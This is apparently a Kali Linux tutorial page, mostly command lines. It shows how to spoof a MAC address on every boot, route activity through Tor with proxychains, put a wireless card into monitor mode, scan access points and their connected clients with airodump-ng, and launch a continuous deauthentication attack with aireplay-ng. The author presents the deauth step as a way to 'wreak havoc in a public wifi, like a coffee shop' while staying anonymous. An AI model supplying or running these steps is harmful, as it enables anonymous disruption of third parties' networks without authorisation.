Remember that you can find further information on any of the commands shown in this page by typing: man [tool] or [tool] --help
We can change our MAC address of our machine using macchanger. If we want the the MAC address to change automatically every time we start Kali Linux, edit contrab:
crontab -e@reboot macchanger -A eth0 (-A will change our machine MAC address to a random vendor MAC address)Tor anonymizes the overlay network for TCP. To install Tor, type:
apt-get install torDon't forget to start Tor prior to run any other pentesting command:
service tor startTo check if tor is running:
service tor statusProxychains is used to anonymize our internet activities. Proxychains configuration file is /etc/proxychains.conf. Editing this file will allow us to choose what type of proxies we will use. The preferred configuration to use with Tor is:
uncomment dynamic_chain
comment strict_chain
add at the end of the file: socks5 127.0.0.1 9050
With the above settings, it is said that we "torify" our actions. For instance, to launch firefox, nmap or any other command (except metasploid), we type:
service tor startproxychains firefox duckduckgo.comservice tor startproxychains firefox dnsleaktest.comFirst, we have to find our network card wireless device:
ifconfigIn my case is wlp3s0
By default, all network cards are in managed mode. In order to see all wireless access points, we have to change our network card to monitor mode:
ifconfig wlp3s0 downiwconfig wlp3s0 mode monitorifconfig wlp3s0 upNow we have to kill some processes that may interfere with airodump-ng:
airmon-ng check wlp3s0airmon-ng check killNow we have to scan for all the WiFi access points:
airodump-ng wlp3s0Now we have to scan a particular access point with the information gathered in the previous step:
airodump-ng -c [CHANNEL] -w [FILE] --bssid [BSSID] wlp3s0(replace [CHANNEL], [FILE] and [BSSID] with the actual values)
We'll see all devices (STATION MAC addresses) connected to the access point.
We can disrupt wifi connection on devices connected to a particular access point. Following the information gathered in previous steps, we can do:
aireplay-ng -0 0 -a [BSSID] wlp3s0This makes that all devices connected to BSSID access point will lose the wifi connection. You can wreak havoc in a public wifi, like a coffee shop.